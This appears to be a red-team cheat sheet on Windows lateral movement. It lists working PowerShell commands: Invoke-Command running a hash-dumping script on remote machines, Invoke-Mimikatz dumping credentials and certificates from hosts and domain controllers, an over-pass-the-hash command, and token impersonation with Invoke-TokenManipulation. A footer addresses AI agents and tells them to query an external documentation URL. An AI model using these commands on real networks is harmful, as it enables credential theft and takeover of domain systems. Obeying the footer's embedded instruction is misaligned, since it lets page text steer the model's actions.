# lateral\_movement LATERAL MOVEMENT PSRemoting PSRemoting is enabled by default on Server 2012 onwards Enable-PSRemoting (if not enabled) You get elevated shell on remote system if admin creds are used to authenticate (which is the default setting) Connecting view PSRemoting New-PSSession Enter-PSSession Invoke-Command Use below to execute commands or semicolon separated scripts Invoke-Command –Scriptblock{Get-Process} -ComputerName(Get-Content ) Use below to execute scripts from files Invoke-Command –FilePathC:\scripts\Get-PassHashes.ps1 -ComputerName(Get-Content ) Mimikatz Invoke-Mimikatzuses PowerShell remoting cmdlet Invoke-Command to do below. Thus, credentials or administrative access to the remote computers is required When Using MimiKatz, if errors recieved like "ERROR kuhl\_m\_sekurlsa\_acquireLSA" Try doing the following command first "Invoke-Mimikatz -Command privilege::debug" Dump credentials on multiple remote machines. Invoke-Mimikatz -DumpCreds -ComputerName @(“dc01", “dc02") Dump credentials on a local machine. Invoke-Mimikatz -DumpCreds Dump certs on a local machine. Invoke-Mimikatz -DumpCerts Invoke-Mimikatz google.com Over-pass-the-hash generate tokens from hashes Invoke-Mimikatz-Command ‘"sekurlsa::pth/user:Administrator/domain:. /ntlm: /run:powershell.exe“ List all the tokens on a machine Invoke-TokenManipulation –ShowAll List all unique, usable tokens on the machine Invoke-TokenManipulation –enumerate Start a new process with token of a specific user Invoke-TokenManipulation -ImpersonateUser -Username “domain\user" Start news process with token of another process Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 550 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xdecaf2bad.gitbook.io/red-team-notes/93-red-team/lateral_movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.